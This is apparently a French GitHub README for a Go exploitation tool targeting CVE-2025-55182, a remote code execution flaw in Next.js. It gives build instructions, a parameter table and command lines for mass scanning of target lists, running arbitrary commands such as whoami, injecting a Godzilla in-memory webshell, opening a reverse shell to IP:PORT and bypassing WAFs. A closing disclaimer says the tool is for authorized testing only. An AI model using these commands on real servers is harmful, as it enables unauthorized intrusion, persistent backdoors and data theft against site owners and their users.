Outil de scan et d'exploitation basé sur Go pour CVE-2025-55182 (RCE Next.js). Prend en charge le scan par lots, l'exécution de commandes, l'injection de shell mémoire Godzilla, le shell inversé et le contournement WAF.
Outil de scan et d'exploitation de la CVE-2025-55182, ciblant la vulnérabilité d'exécution de code à distance dans les applications Next.js. Prend en charge la détection en masse, l'exécution de commandes, l'injection de cheval de Troie mémoire Godzilla ainsi que la fonction de reverse shell.
⚠️ Cet outil est exclusivement destiné à la recherche en sécurité et aux tests autorisés. Ne l'utilisez pas à des fins illégales.
.txt.success.json, avec possibilité d'exporter les URLs vulnérables vers un fichier spécifié.[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
| Paramètre | Type | Valeur par défaut | Description |
|---|---|---|---|
-u | string | aucun | URL cible unique (par exemple http://example.com:3000) |
-f | string | aucun | Fichier contenant la liste des URLs (une par ligne) |
-d | string | aucun | Dossier contenant plusieurs fichiers .txt |
-o | string | aucun | Fichier de sortie (enregistre les URLs vulnérables, une par ligne) |
-t | int | 10 | Nombre de threads concurrents |
-to | int | 10 | Délai d'expiration des requêtes (en secondes) |
-c | string | aucun | Commande à exécuter (par exemple id) |
-m | string | aucun | Mode : waf (active le contournement WAF) |
-p | string | aucun | Proxy HTTP (par exemple http://127.0.0.1:8080) |
-g | bool | false | Active l'injection du cheval de Troie mémoire Godzilla |
-rs | string | aucun | Adresse du reverse shell (format IP:PORT) |
-dv | bool | false | Mode verbeux (affiche le processus de scan pour chaque URL) |
-es | bool | false | Mode de scan des informations sensibles |
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
Après une injection réussie, l'outil affiche l'adresse de connexion, le mot de passe, la clé et les informations d'en-tête de requête Godzilla.
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json : enregistre automatiquement les détails complets de toutes les cibles exploitées avec succès (y compris la sortie des commandes, la configuration Godzilla, etc.).-o : enregistre la liste des URLs vulnérables (une par ligne).Pendant le scan, une barre de progression et les vulnérabilités découvertes sont affichées en temps réel, avec un récapitulatif statistique final.
-p pour définir le proxy.-to en conséquence.Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés. L'utilisateur assume seul l'entière responsabilité légale. Le développeur décline toute responsabilité en cas d'utilisation abusive.